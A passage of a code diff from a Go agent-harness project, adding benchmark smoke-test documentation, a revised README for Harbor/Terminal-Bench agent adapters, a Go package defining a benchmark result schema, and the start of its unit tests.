+  end-to-end in a single test process with no Docker, no network, no API key, and no LLM.
+- A scripted `fakeprovider` returns a deterministic turn (`content="smoke ok"`, `usage.prompt=100`,
+  `usage.completion=50`, `cost_usd=0.001`, `cost_status="available"`).
+- The following `RunSummary` fields are asserted byte-stable:
+
+  | Field | Value |
+  |---|---|
+  | `status` | `"completed"` |
+  | `steps_taken` | `1` |
+  | `total_prompt_tokens` | `100` |
+  | `total_completion_tokens` | `50` |
+  | `total_cost_usd` | `0.001` |
+  | `cost_status` | `"available"` |
+
+- `benchresult.FromRun` is called on the completed run, producing a JSON artifact; grounded fields
+  (`run_id`, `model`, `provider_name`, `tokens`, `cost`, `steps`, `status`, `duration_ms`) are
+  re-asserted against the same constants.
+- `fakeprovider.Calls() == 1` verifies the provider was called exactly once.
+- Passes under `-race`.
+
+**File:** `internal/server/run_smoke_test.go` (package `server`; no import cycle).
+
+**Honesty note:** `total_cost_usd` is a DERIVED field — it is accumulated by `Runner.recordAccounting`
+from the scripted `Cost.TotalUSD` in the fake turn. It is not a raw provider API field.
+
+---
+
+## 2. Key-free shell smoke
+
+**Command:**
+
+```bash
+bash scripts/run-bench-smoke.sh
+```
+
+**Expected deterministic output (all 13 assertions pass):**
+
+```
+[bench-smoke] PASS: wrote fake turns file
+[bench-smoke] PASS: harnessd built: .../harnessd-bench-smoke
+[bench-smoke] PASS: /healthz responding
+[bench-smoke] PASS: POST /v1/runs → run_id=<uuid>
+[bench-smoke] PASS: run terminal status: completed
+[bench-smoke] PASS: summary fetched
+[bench-smoke] PASS: summary.run_id=<uuid>
+[bench-smoke] PASS: summary.status=completed
+[bench-smoke] PASS: summary.steps_taken=1
+[bench-smoke] PASS: summary.total_prompt_tokens=100
+[bench-smoke] PASS: summary.total_completion_tokens=50
+[bench-smoke] PASS: summary.total_cost_usd=0.001
+[bench-smoke] PASS: summary.cost_status=available
+[bench-smoke] ALL ASSERTIONS PASSED
+```
+
+The `run_id` UUIDs will differ between runs; all other asserted values are byte-stable.
+
+**What it proves:**
+
+The real `harnessd` binary (built with `go build ./cmd/harnessd`) starts with the fake-provider path
+(`HARNESS_PROVIDER=fake`), serves the real HTTP API, and produces the same deterministic summary fields
+as the in-process Go smoke. No OpenAI or Anthropic API key is needed.
+
+**Output file:** `/tmp/harnessd-bench-smoke-result.json` (overwritten on each run; path is
+configurable via `HARNESS_BENCH_SMOKE_OUTPUT`).
+
+**Environment overrides:**
+
+| Variable | Default | Description |
+|---|---|---|
+| `HARNESS_BINARY` | `$REPO_ROOT/harnessd-bench-smoke` | Path to harnessd binary |
+| `HARNESS_BENCH_SMOKE_LOG` | `/tmp/harnessd-bench-smoke.log` | Server log |
+| `HARNESS_BENCH_SMOKE_OUTPUT` | `/tmp/harnessd-bench-smoke-result.json` | Result JSON |
+| `HARNESS_BENCH_SMOKE_TURNS` | `/tmp/harnessd-bench-smoke-turns.json` | Fake turns file |
+| `HARNESS_BENCH_SMOKE_TIMEOUT` | `30` | Max seconds to wait for run completion |
+| `HARNESS_BENCH_SMOKE_SKIP_BUILD` | _(unset)_ | Skip `go build` when non-empty and binary exists |
+
+**Design note:** The POST body includes `"allow_fallback":true`. When no API key is set, the runner's
+provider-registry lookup for the default model (`gpt-4.1-mini`) fails; `allow_fallback=true` causes the
+runner to fall back to its direct `r.provider` (the fake), which is the correct key-free path.
+
+**Requirements:** Go toolchain on PATH, `curl`, `python3`.
+
+---
+
+## 3. Result schema — `internal/benchresult`
+
+**Package:** `internal/benchresult` (`result.go` + `result_test.go`)
+
+**Entry point:** `benchresult.FromRun(summary harness.RunSummary, run harness.Run) BenchmarkResult`
+
+Every field in `BenchmarkResult` is sourced exactly:
+
+| Field | Source | Notes |
+|---|---|---|
+| `run_id` | `RunSummary.RunID` = `Run.ID` | Raw |
+| `status` | `RunSummary.Status` | `"completed"` or `"failed"` — NOT task pass/fail |
+| `steps_taken` | `RunSummary.StepsTaken` | Raw |
+| `total_prompt_tokens` | `RunSummary.TotalPromptTokens` | Raw |
+| `total_completion_tokens` | `RunSummary.TotalCompletionTokens` | Raw |
+| `total_cost_usd` | `RunSummary.TotalCostUSD` | Raw field (itself accumulated by runner) |
+| `cost_status` | `RunSummary.CostStatus` | Raw (`"available"`, `"unpriced_model"`, etc.) |
+| `cache_hit_rate` | `RunSummary.CacheHitRate` | Raw |
+| `error_message` | `RunSummary.Error` | Raw; omitted when empty |
+| `model` | `Run.Model` | Raw |
+| `provider_name` | `Run.ProviderName` | Raw; omitted when empty |
+| `prompt` | `Run.Prompt` | Raw |
+| `output` | `Run.Output` | Raw; omitted when empty |
+| `tenant_id`, `conversation_id`, `agent_id` | `Run.*` fields | Raw; omitted when empty |
+| `created_at`, `updated_at` | `Run.CreatedAt`, `Run.UpdatedAt` | Raw UTC timestamps |
+| `duration_ms` | **DERIVED** | `Run.UpdatedAt.Sub(Run.CreatedAt).Milliseconds()` — not a provider API field |
+| `rollout_path` | **RECONSTRUCTED** | `<rolloutDir>/<YYYY-MM-DD>/<run_id>.jsonl`; always empty from `FromRun`; populate via `benchresult.ReconstructRolloutPath(rolloutDir, run)` |
+| `tool_calls` | `RunSummary.ToolCalls` | Mapped 1:1 to `ToolCallRecord{ToolName, Step}` |
+| `drift` | **EXTERNAL/opt-in** | Always `nil` from `FromRun`; set by external drift oracle |
+| `forensic_events` | **EXTERNAL/opt-in** | Always `nil` from `FromRun`; set by external log loader |
+
+**No task pass/fail field exists in `BenchmarkResult`.** Whether a task was solved is an external
+judgment (from a pytest oracle such as terminal-bench's grader). It is not present in the harness API.
+
+The JSON schema for comparison harness records is at `benchmarks/comparison/result.schema.json`, which
+mirrors these fields with honesty annotations.
+
+---
+
+## 4. Comparison harness — `benchmarks/comparison/`
+
+The comparison harness is an **operator-run, env-driven shell orchestrator** — not an automated CI job.
+It records what entrant tools produce; it does not assert accuracy.
+
+### Shape
+
+```
+benchmarks/comparison/
+  tools.json              — entrant registry (one active entrant: go-code)
+  result.schema.json      — JSON schema for result records (mirrors benchresult)
+  run.sh                  — orchestrator: TASK_SET_DIR × MODEL × active entrants
+  adapters/
+    template.sh           — adapter contract (I/O specification)
+    go-code.sh            — real adapter for this harness
+```
+
+### Adding an entrant
+
+1. Write `adapters/<your-tool>.sh` following the contract in `adapters/template.sh`.
+   - The adapter receives: `TASK_DIR`, `WORKSPACE`, `PROMPT`, `MODEL`, `RESULT_JSON`, `TASK_ID`, `TOOL_ID` env vars.
+   - It must write a JSON record conforming to `result.schema.json` to `$RESULT_JSON`.
+   - It must exit 0 on success, non-zero on failure.
+   - It must NOT set `is_resolved` — that comes from the pytest oracle after the run.
+2. Move the stub entry for your tool from `_stub_entrants_not_active` into the `entrants` array in
+   `tools.json`, filling in `id`, `adapter`, `display_name`, and `key_env`.
+3. Run the harness:
+
+```bash
+TASK_SET_DIR=/path/to/tasks \
+MODEL=gpt-4.1-mini \
+./benchmarks/comparison/run.sh
+```
+
+Output lands in `.tmp/comparison/<timestamp>/`:
+- `results.jsonl` — one record per (tool, task) pair
+- `report.txt` — counts only; no accuracy claims
+- `run-env.json` — git SHA + model + entrants for provenance
+
+**Honesty notice:** The report does not make head-to-head accuracy comparisons. `is_resolved` (task
+pass/fail) must come from the pytest oracle; it is absent from the raw records.
+
+---
+
+## 5. Python benchmark paths
+
+Both Python harnesses require external dependencies and API keys. They have **not been end-to-end
+executed in this development environment** — the intended commands are documented from reading the
+source. Treat these as operational guides, not verified recipes.
+
+### 5a. `benchmarks/terminal_bench/` — Terminal-Bench private task suite
+
+**What it is:** A `GoAgentHarnessAgent` class implementing the `terminal_bench.BaseAgent` interface.
+It cross-compiles `harnessd` and `harnesscli` into the task container and drives tasks via the harness
+HTTP API. 7 custom Go coding tasks are included under `benchmarks/terminal_bench/tasks/`.
+
+**Python dependency (not installed here):**
+
+```bash
+pip install terminal-bench
+```
+
+`terminal_bench` and its transitive dependencies (`terminal_bench.agents`,
+`terminal_bench.terminal.tmux_session`, etc.) are not installed in this environment
+(`ModuleNotFoundError: No module named 'terminal_bench'`).
+
+**Intended command (run from project root):**
+
+```bash
+terminal-bench run \
+  --agent benchmarks.terminal_bench.agent:GoAgentHarnessAgent \
+  --task go-interface-migration
+```
+
+**Required keys / env:**
+
+| Variable | Required | Notes |
+|---|---|---|
+| `OPENAI_API_KEY` | Yes (default) | Or set `OPENAI_BASE_URL` for a compatible endpoint |
+| `HARNESS_BENCH_MODEL` | No | Default: `gpt-5-mini` (as hardcoded in `agent.py`) |
+| `HARNESS_BENCH_MAX_STEPS` | No | Default: `100` |
+| `HARNESS_BENCH_MEMORY_MODE` | No | Default: `off` |
+| `HARNESS_BENCH_TARGET_ARCH` | No | `amd64` or `arm64`; auto-detected |
+
+**Honesty caveat:** The `baseline.json` in `benchmarks/terminal_bench/` contains
+illustrative/sample baseline values. Its `_comment` attributes them to a run named
+`full-final-20260308-005332`, but no archived run data exists in this repo to verify that
+provenance. Treat the numbers as sample expectations, not as verified historical measurements.
+
+### 5b. `harness_agent/` — Harbor framework adapters (Terminal-Bench 2.0 leaderboard)
+
+Two adapters for the [Harbor](https://github.com/harbor-ai/harbor) framework:
+
+- `harness_agent/agent.py` — `HarnessAgent`: calls Anthropic or OpenAI APIs directly; exposes a
+  `bash` tool; runs up to 100 turns.
+- `harness_agent/installed_agent.py` — `HarnessInstalledAgent`: uploads pre-built `harnessd` /
+  `harnesscli` binaries into the Harbor container and runs the full harness.
+
+**Python dependencies (not installed here):**
+
+```bash
+# For HarnessAgent (direct API mode)
+pip install harbor anthropic openai httpx
+
+# For HarnessInstalledAgent (full harness mode)
+pip install harbor
+```
+
+`harbor` is not installed in this environment (`ModuleNotFoundError: No module named 'harbor'`).
+
+**`harness_agent/bin/` is empty.** Before using `HarnessInstalledAgent`, build binaries first:
+
+```bash
+./harness_agent/build_binaries.sh
+```
+
+**Intended commands (run from project root):**
+
+```bash
+# HarnessAgent — 5 tasks, claude-sonnet-4-6
+./harness_agent/run_bench.sh
+
+# HarnessAgent — custom model and count
+./harness_agent/run_bench.sh anthropic/claude-opus-4-6 20
+
+# HarnessInstalledAgent — 3 tasks, gpt-4.1-mini
+./harness_agent/build_binaries.sh
+./harness_agent/run_installed.sh
+```
+
+**Required keys / env:**
+
+| Variable | Required by | Notes |
+|---|---|---|
+| `ANTHROPIC_API_KEY` | `HarnessAgent` (anthropic/ models) | Anthropic API key |
+| `OPENAI_API_KEY` | `HarnessAgent` (openai/ models) | OpenAI API key |
+| `GOOGLE_API_KEY` | `HarnessInstalledAgent` | Passed through to `harnessd` |
+
+---
+
+## 6. Honesty caveats for real-LLM benchmark runs
+
+- **Every real-LLM benchmark run is paid and non-deterministic.** Results differ across runs even with
+  the same model, prompt, and temperature settings.
+- **Always record the exact model name, provider, git SHA, and n (number of runs).** A single
+  data point is an anecdote, not a benchmark. Use `run-env.json` from `benchmarks/comparison/run.sh`
+  for provenance.
+- **`status=completed` does not mean the task was solved.** It means the harness finished without
+  error. Task pass/fail is a separate external judgment.
+- **Default models vary across harnesses:**
+  - `benchmarks/terminal_bench/agent.py`: default `gpt-5-mini` (hardcoded)
+  - `docs/runbooks/terminal-bench-periodic-suite.md`: default `gpt-5-nano`
+  - `harness_agent/`: model passed by Harbor at runtime
+  - Comparison harness (`benchmarks/comparison/`): `MODEL` env var; no default
+- **`duration_ms` is DERIVED** (`updated_at − created_at`). It measures harness wall-clock time, not
+  pure model latency.
+- **`rollout_path` is RECONSTRUCTED** and requires the server's `RolloutDir` out-of-band. Leave empty
+  if unknown; never guess.

--- a/harness_agent/README.md
+++ b/harness_agent/README.md
@@ -1,43 +1,115 @@
-# Harbor Agent Adapter
+# harness_agent/
 
-A [Harbor](https://github.com/harbor-ai/harbor) framework adapter that lets
+Two [Harbor](https://github.com/harbor-ai/harbor) framework agent adapters that let
 go-agent-harness compete on the Terminal-Bench 2.0 public leaderboard.
 
-The Python package lives at `harness_agent/` (not `harbor/`) to avoid
-shadowing the installed `harbor` framework package.
+The Python package lives at `harness_agent/` (not `harbor/`) to avoid shadowing the installed
+`harbor` framework package.
 
-## What it does
+---
 
-`harness_agent/agent.py` provides `HarnessAgent`, a `BaseAgent` subclass that:
+## Agents
 
-- Calls the **Anthropic Messages API** directly (via the `anthropic` Python SDK,
-  or raw `httpx` as fallback).
+### agent.py — HarnessAgent (direct API mode)
+
+`HarnessAgent` is a `BaseAgent` subclass that:
+
+- Calls the **Anthropic Messages API** or **OpenAI Chat Completions API** directly (provider
+  selected from the `provider/model` prefix passed by Harbor).
+- Uses the `anthropic` or `openai` SDK when available; falls back to raw `httpx` for both.
 - Exposes a single **`bash` tool** to the LLM.
-- Routes every bash call through `environment.exec()` so it runs inside the
-  Harbor-managed container, not on the host.
-- Runs up to **200 turns** before stopping.
+- Routes every bash call through `environment.exec()` so it runs inside the Harbor-managed
+  container, not on the host.
+- Runs up to **100 turns** before stopping.
 - Populates `AgentContext` with token counts and estimated cost in USD.
+
+### installed_agent.py — HarnessInstalledAgent (full harness mode)
+
+`HarnessInstalledAgent` is a `BaseAgent` subclass that:
+
+- Uploads pre-built `harnessd` and `harnesscli` binaries from `harness_agent/bin/` into the
+  Harbor container during `setup()`.
+- Uploads `prompts/` and (if present) `catalog/models.json` into the container.
+- Starts `harnessd` inside the container, waits for it to be healthy, then runs the task via
+  `harnesscli`.
+- This mode tests the **full harness** (all tools, the system prompt, the agent loop) — the
+  model is just the backend.
+
+---
 
 ## Prerequisites
 
+### Python dependencies
+
 ```bash
-pip install anthropic harbor
-export ANTHROPIC_API_KEY="sk-ant-..."
+# For HarnessAgent (direct API mode)
+pip install harbor anthropic openai httpx
+
+# For HarnessInstalledAgent (full harness mode)
+pip install harbor
 ```
 
+**Honesty note:** The `harbor` package is **not installed in this development environment** and
+cannot be imported (`ModuleNotFoundError: No module named 'harbor'`). The intended commands
+below are documented from reading the source; they have **not been end-to-end executed** in
+this environment. The `anthropic` package is also not installed here; `openai` and `httpx` are
+available.
+
+### Environment variables
+
+| Variable | Required by | Description |
+|---|---|---|
+| `ANTHROPIC_API_KEY` | HarnessAgent (anthropic/ models) | Anthropic API key |
+| `OPENAI_API_KEY` | HarnessAgent (openai/ models) | OpenAI API key |
+| `GOOGLE_API_KEY` | HarnessInstalledAgent | Google API key (passed through to harnessd) |
+
+---
+
+## bin/ directory
+
+`harness_agent/bin/` is **empty** (contains only `.gitkeep`). Pre-built binaries are not
+committed to the repository. Before using `HarnessInstalledAgent` or `run_installed.sh`, you
+must build the binaries:
+
+```bash
+# From the project root
+./harness_agent/build_binaries.sh
+```
+
+This cross-compiles `harnessd` and `harnesscli` for linux/amd64 and linux/arm64 using the Go
+toolchain from the project root, writing binaries to `harness_agent/bin/`:
+
+```
+harness_agent/bin/
+  harnessd-linux-amd64
+  harnesscli-linux-amd64
+  harnessd-linux-arm64
+  harnesscli-linux-arm64
+```
+
+Requires: Go toolchain on PATH, `GOOS`/`GOARCH` cross-compilation support (standard with the
+Go distribution).
+
+---
+
 ## Quick start
+
+### HarnessAgent (direct API, no pre-built binaries needed)
 
 Run from the **project root** so that `harness_agent/` is on the Python path:
 
 ```bash
-# Run 5 tasks from the terminal-bench 2.0 dataset with claude-sonnet-4-6
+# Run 5 tasks from terminal-bench 2.0 with claude-sonnet-4-6 (Anthropic)
 ./harness_agent/run_bench.sh
 
 # Run 20 tasks with opus
 ./harness_agent/run_bench.sh anthropic/claude-opus-4-6 20
+
+# Run with an OpenAI model
+./harness_agent/run_bench.sh openai/gpt-4.1 10
 ```
 
-Or invoke harbor directly (from the project root):
+Or invoke harbor directly:
 
 ```bash
 harbor run \
@@ -47,30 +119,65 @@ harbor run \
   -n 5
 ```
 
+### HarnessInstalledAgent (full harness inside container)
+
+```bash
+# Build binaries first
+./harness_agent/build_binaries.sh
+
+# Run 3 tasks with gpt-4.1-mini (default)
+./harness_agent/run_installed.sh
+
+# Run with a different model
+./harness_agent/run_installed.sh openai/gpt-4.1 5
+```
+
+Or invoke harbor directly:
+
+```bash
+harbor run \
+  -d terminal-bench@2.0 \
+  --agent-import-path harness_agent.installed_agent:HarnessInstalledAgent \
+  -m openai/gpt-4.1-mini \
+  -n 3
+```
+
+---
+
 ## System prompt
 
-The agent loads `prompts/compiled/system_prompt.txt` relative to the project
-root if that file exists.  Otherwise it falls back to a built-in default and
-prints a warning to stderr.
+`agent.py` loads `prompts/compiled/system_prompt.txt` relative to the project root, if that
+file exists, prepending a bash-directive block. Falls back to a built-in default system prompt
+(`prompts.py::DEFAULT_SYSTEM_PROMPT`) if the file is absent or empty, with a warning to stderr.
 
-There is currently no built-in `harnessd` prompt-compilation subcommand in this
-repository. If you maintain a compiled prompt file, generate or update
-`prompts/compiled/system_prompt.txt` using your external prompt build workflow
-before benchmark runs.
+There is no built-in `harnessd` prompt-compilation subcommand in this repository. If you
+maintain a compiled prompt file, generate or update `prompts/compiled/system_prompt.txt` using
+your external prompt build workflow before benchmark runs.
+
+---
 
 ## Leaderboard submission
 
-Follow the official Terminal-Bench submission guide.  The key flag is
-`--agent-import-path harness_agent.agent:HarnessAgent`.  Run from the
-project root so that `harness_agent/` is on the Python path.
+Follow the official Terminal-Bench submission guide. Key flags:
+
+- For direct API mode: `--agent-import-path harness_agent.agent:HarnessAgent`
+- For full harness mode: `--agent-import-path harness_agent.installed_agent:HarnessInstalledAgent`
+
+Run from the project root so that `harness_agent/` is on the Python path.
+
+---
 
 ## File layout
 
 ```
 harness_agent/
-  __init__.py      — package metadata
-  agent.py         — HarnessAgent implementation
-  prompts.py       — system prompt loader
-  run_bench.sh     — convenience wrapper around `harbor run`
-  README.md        — this file
+  __init__.py          — package metadata (version 0.1.0)
+  agent.py             — HarnessAgent: direct Anthropic/OpenAI API mode
+  installed_agent.py   — HarnessInstalledAgent: full harness inside container
+  prompts.py           — system prompt loader (compiled or built-in default)
+  build_binaries.sh    — cross-compile harnessd + harnesscli for linux/amd64 + arm64
+  run_bench.sh         — convenience wrapper around `harbor run` (HarnessAgent)
+  run_installed.sh     — convenience wrapper around `harbor run` (HarnessInstalledAgent)
+  bin/                 — pre-built binaries (empty; run build_binaries.sh first)
+  README.md            — this file
 ```

--- a/internal/benchresult/result.go
+++ b/internal/benchresult/result.go
@@ -1,0 +1,258 @@
+// Package benchresult provides a structured schema for benchmark run results.
+// Every field is annotated to its real source: RunSummary, Run, DERIVED,
+// RECONSTRUCTED, or EXTERNAL/opt-in. No fields are invented or inferred beyond
+// the listed sources.
+package benchresult
+
+import (
+	"fmt"
+	"time"
+
+	"go-agent-harness/internal/harness"
+)
+
+// BenchmarkResult is the serialisable record produced from a completed harness
+// run. It is grounded 1:1 in harness.RunSummary and harness.Run — no invented
+// fields. Fields marked DERIVED are computed deterministically from raw fields.
+// Fields marked RECONSTRUCTED require caller-supplied context (rolloutDir).
+// Fields marked EXTERNAL/opt-in are never populated by FromRun; callers fill
+// them after the fact from external oracles (drift analysis, forensic logs).
+type BenchmarkResult struct {
+	// --- Identity (source: RunSummary.RunID / Run.ID — identical values) ---
+
+	// RunID is the unique run identifier.
+	// Source: RunSummary.RunID (= Run.ID).
+	RunID string `json:"run_id"`
+
+	// --- Status (source: RunSummary.Status) ---
+
+	// Status is the terminal run status: "completed" or "failed".
+	// Note: there is no task-level pass/fail here; that is an external oracle.
+	// Source: RunSummary.Status (harness.RunStatus).
+	Status string `json:"status"`
+
+	// --- Step and token counters (source: RunSummary) ---
+
+	// StepsTaken is the number of LLM turns completed before the run ended.
+	// Source: RunSummary.StepsTaken.
+	StepsTaken int `json:"steps_taken"`
+
+	// TotalPromptTokens is the cumulative input-token count across all turns.
+	// Source: RunSummary.TotalPromptTokens.
+	TotalPromptTokens int `json:"total_prompt_tokens"`
+
+	// TotalCompletionTokens is the cumulative output-token count across all turns.
+	// Source: RunSummary.TotalCompletionTokens.
+	TotalCompletionTokens int `json:"total_completion_tokens"`
+
+	// --- Cost fields (source: RunSummary) ---
+
+	// TotalCostUSD is the total monetary cost of the run in USD.
+	// Source: RunSummary.TotalCostUSD.
+	TotalCostUSD float64 `json:"total_cost_usd"`
+
+	// CostStatus reports the pricing confidence level (e.g. "available",
+	// "unpriced_model", "provider_unreported").
+	// Source: RunSummary.CostStatus (harness.CostStatus).
+	CostStatus string `json:"cost_status"`
+
+	// --- Cache (source: RunSummary) ---
+
+	// CacheHitRate is the fraction of prompt tokens served from cache ([0, 1]).
+	// Source: RunSummary.CacheHitRate.
+	CacheHitRate float64 `json:"cache_hit_rate"`
+
+	// --- Error (source: RunSummary) ---
+
+	// ErrorMessage is non-empty only when Status == "failed".
+	// Source: RunSummary.Error.
+	ErrorMessage string `json:"error_message,omitempty"`
+
+	// --- Run identity fields (source: Run) ---
+
+	// Model is the model name used for this run (e.g. "gpt-4.1-mini").
+	// Source: Run.Model.
+	Model string `json:"model"`
+
+	// ProviderName is the resolved provider key (e.g. "openai", "anthropic").
+	// Source: Run.ProviderName.
+	ProviderName string `json:"provider_name,omitempty"`
+
+	// Prompt is the task prompt submitted to the agent.
+	// Source: Run.Prompt.
+	Prompt string `json:"prompt"`
+
+	// Output is the final agent response text.
+	// Source: Run.Output.
+	Output string `json:"output,omitempty"`
+
+	// TenantID is the tenant scoping key, if set.
+	// Source: Run.TenantID.
+	TenantID string `json:"tenant_id,omitempty"`
+
+	// ConversationID is the conversation continuity key, if set.
+	// Source: Run.ConversationID.
+	ConversationID string `json:"conversation_id,omitempty"`
+
+	// AgentID is the agent identifier, if set.
+	// Source: Run.AgentID.
+	AgentID string `json:"agent_id,omitempty"`
+
+	// --- Timestamps (source: Run) ---
+
+	// CreatedAt is the UTC timestamp when the run was created.
+	// Source: Run.CreatedAt.
+	CreatedAt time.Time `json:"created_at"`
+
+	// UpdatedAt is the UTC timestamp of the last run state change.
+	// Source: Run.UpdatedAt.
+	UpdatedAt time.Time `json:"updated_at"`
+
+	// --- DERIVED fields ---
+
+	// DurationMs is the wall-clock run duration in milliseconds.
+	// DERIVED: Run.UpdatedAt.Sub(Run.CreatedAt).Milliseconds().
+	DurationMs int64 `json:"duration_ms"`
+
+	// --- RECONSTRUCTED fields ---
+
+	// RolloutPath is the expected JSONL rollout file path for this run.
+	// RECONSTRUCTED: <rolloutDir>/<YYYY-MM-DD>/<run_id>.jsonl, where the date
+	// is derived from Run.CreatedAt in UTC. Empty when rolloutDir is unknown
+	// (FromRun never populates this; call ReconstructRolloutPath separately).
+	RolloutPath string `json:"rollout_path,omitempty"`
+
+	// --- Tool call records (source: RunSummary.ToolCalls) ---
+
+	// ToolCallRecords is the ordered list of tool invocations recorded during the run.
+	// Source: RunSummary.ToolCalls ([]harness.ToolCallSummary).
+	ToolCallRecords []ToolCallRecord `json:"tool_calls"`
+
+	// --- EXTERNAL / opt-in fields ---
+
+	// Drift is populated by an external drift-analysis oracle AFTER the run.
+	// FromRun always leaves this nil; it is never derived from harness data.
+	// EXTERNAL/opt-in.
+	Drift *DriftSummary `json:"drift,omitempty"`
+
+	// ForensicEvents is an optional slice of raw forensic event payloads
+	// captured from the rollout JSONL by an external loader.
+	// FromRun always leaves this nil; populate it from the rollout file if needed.
+	// EXTERNAL/opt-in.
+	ForensicEvents []map[string]any `json:"forensic_events,omitempty"`
+}
+
+// ToolCallRecord records a single tool invocation within a run.
+// Source: harness.ToolCallSummary.
+type ToolCallRecord struct {
+	// ToolName is the registered name of the tool that was called.
+	// Source: harness.ToolCallSummary.ToolName.
+	ToolName string `json:"tool_name"`
+
+	// Step is the LLM turn number during which the tool was called (1-indexed).
+	// Source: harness.ToolCallSummary.Step.
+	Step int `json:"step"`
+}
+
+// DriftSummary holds drift-analysis results produced by an external oracle
+// (e.g. a comparison between this run's output and a reference baseline).
+// All fields here are EXTERNAL — they must be filled by the caller from
+// outside the harness API; none are available from RunSummary or Run.
+type DriftSummary struct {
+	// BaselineRunID is the run ID of the reference run being compared against.
+	// EXTERNAL: must be provided by the caller.
+	BaselineRunID string `json:"baseline_run_id,omitempty"`
+
+	// OutputSimilarity is a [0, 1] similarity score between this run's output
+	// and the baseline output, as computed by the external oracle.
+	// EXTERNAL: must be provided by the caller.
+	OutputSimilarity float64 `json:"output_similarity"`
+
+	// DriftFlags is a list of free-text flags describing detected differences
+	// (e.g. "token_count_increased_20pct", "missing_tool_call:bash").
+	// EXTERNAL: must be provided by the caller.
+	DriftFlags []string `json:"drift_flags,omitempty"`
+}
+
+// FromRun constructs a BenchmarkResult from a completed run's summary and
+// run record. Every populated field maps 1:1 from summary or run (or is
+// explicitly DERIVED). RECONSTRUCTED fields (RolloutPath) and EXTERNAL/opt-in
+// fields (Drift, ForensicEvents) are left at their zero values.
+//
+// To populate RolloutPath, call ReconstructRolloutPath(rolloutDir, run) and
+// assign the result:
+//
+//	result := benchresult.FromRun(summary, run)
+//	result.RolloutPath = benchresult.ReconstructRolloutPath(cfg.RolloutDir, run)
+func FromRun(summary harness.RunSummary, run harness.Run) BenchmarkResult {
+	toolRecords := make([]ToolCallRecord, len(summary.ToolCalls))
+	for i, tc := range summary.ToolCalls {
+		toolRecords[i] = ToolCallRecord{
+			ToolName: tc.ToolName,
+			Step:     tc.Step,
+		}
+	}
+
+	return BenchmarkResult{
+		// Identity
+		RunID: summary.RunID,
+
+		// Status
+		Status: string(summary.Status),
+
+		// Step / token counters (source: RunSummary)
+		StepsTaken:            summary.StepsTaken,
+		TotalPromptTokens:     summary.TotalPromptTokens,
+		TotalCompletionTokens: summary.TotalCompletionTokens,
+
+		// Cost (source: RunSummary)
+		TotalCostUSD: summary.TotalCostUSD,
+		CostStatus:   string(summary.CostStatus),
+
+		// Cache (source: RunSummary)
+		CacheHitRate: summary.CacheHitRate,
+
+		// Error (source: RunSummary)
+		ErrorMessage: summary.Error,
+
+		// Run identity (source: Run)
+		Model:          run.Model,
+		ProviderName:   run.ProviderName,
+		Prompt:         run.Prompt,
+		Output:         run.Output,
+		TenantID:       run.TenantID,
+		ConversationID: run.ConversationID,
+		AgentID:        run.AgentID,
+
+		// Timestamps (source: Run)
+		CreatedAt: run.CreatedAt,
+		UpdatedAt: run.UpdatedAt,
+
+		// DERIVED: wall-clock duration
+		DurationMs: run.UpdatedAt.Sub(run.CreatedAt).Milliseconds(),
+
+		// RECONSTRUCTED: RolloutPath — left empty; caller uses ReconstructRolloutPath
+		RolloutPath: "",
+
+		// Tool calls (source: RunSummary.ToolCalls)
+		ToolCallRecords: toolRecords,
+
+		// EXTERNAL/opt-in — always nil/empty from FromRun
+		Drift:          nil,
+		ForensicEvents: nil,
+	}
+}
+
+// ReconstructRolloutPath returns the expected JSONL rollout file path for run,
+// using the convention: <rolloutDir>/<YYYY-MM-DD>/<run_id>.jsonl, where the
+// date is derived from run.CreatedAt in UTC.
+//
+// Returns an empty string when rolloutDir is empty — never guesses the directory.
+// This matches the path written by RunnerConfig.RolloutDir in the harness.
+func ReconstructRolloutPath(rolloutDir string, run harness.Run) string {
+	if rolloutDir == "" {
+		return ""
+	}
+	date := run.CreatedAt.UTC().Format("2006-01-02")
+	return fmt.Sprintf("%s/%s/%s.jsonl", rolloutDir, date, run.ID)
+}

--- a/internal/benchresult/result_test.go
+++ b/internal/benchresult/result_test.go
@@ -1,0 +1,255 @@
+package benchresult_test
+
+import (
+	"encoding/json"
+	"testing"
+	"time"
+
+	"go-agent-harness/internal/benchresult"
+	"go-agent-harness/internal/harness"
+)
+
+// makeTestPair returns a minimal but complete RunSummary + Run pair for assertions.
+func makeTestPair() (harness.RunSummary, harness.Run) {
+	now := time.Date(2025, 1, 15, 12, 0, 0, 0, time.UTC)
+	later := now.Add(37 * time.Second)
+
+	summary := harness.RunSummary{
+		RunID:                 "run-abc123",
+		Status:                harness.RunStatusCompleted,
+		StepsTaken:            4,
+		TotalPromptTokens:     800,
+		TotalCompletionTokens: 200,
+		TotalCostUSD:          0.0042,
+		CostStatus:            harness.CostStatusAvailable,
+		ToolCalls: []harness.ToolCallSummary{
+			{ToolName: "bash", Step: 1},
+			{ToolName: "read_file", Step: 2},
+		},
+		CacheHitRate: 0.25,
+		Error:        "",
+	}
+
+	run := harness.Run{
+		ID:             "run-abc123",
+		Prompt:         "Do something useful",
+		Model:          "gpt-4.1-mini",
+		ProviderName:   "openai",
+		Status:         harness.RunStatusCompleted,
+		Output:         "Done.",
+		Error:          "",
+		TenantID:       "tenant-1",
+		ConversationID: "conv-99",
+		AgentID:        "agent-7",
+		CreatedAt:      now,
+		UpdatedAt:      later,
+	}
+
+	return summary, run
+}
+
+// TestFromRun_MapsRunSummaryFields asserts that every RunSummary field appears
+// verbatim in the returned BenchmarkResult (run_id, status, steps, tokens,
+// cost, cache_hit_rate, error).
+func TestFromRun_MapsRunSummaryFields(t *testing.T) {
+	summary, run := makeTestPair()
+	result := benchresult.FromRun(summary, run)
+
+	if result.RunID != summary.RunID {
+		t.Errorf("RunID: got %q, want %q", result.RunID, summary.RunID)
+	}
+	if result.Status != string(summary.Status) {
+		t.Errorf("Status: got %q, want %q", result.Status, summary.Status)
+	}
+	if result.StepsTaken != summary.StepsTaken {
+		t.Errorf("StepsTaken: got %d, want %d", result.StepsTaken, summary.StepsTaken)
+	}
+	if result.TotalPromptTokens != summary.TotalPromptTokens {
+		t.Errorf("TotalPromptTokens: got %d, want %d", result.TotalPromptTokens, summary.TotalPromptTokens)
+	}
+	if result.TotalCompletionTokens != summary.TotalCompletionTokens {
+		t.Errorf("TotalCompletionTokens: got %d, want %d", result.TotalCompletionTokens, summary.TotalCompletionTokens)
+	}
+	if result.TotalCostUSD != summary.TotalCostUSD {
+		t.Errorf("TotalCostUSD: got %v, want %v", result.TotalCostUSD, summary.TotalCostUSD)
+	}
+	if result.CostStatus != string(summary.CostStatus) {
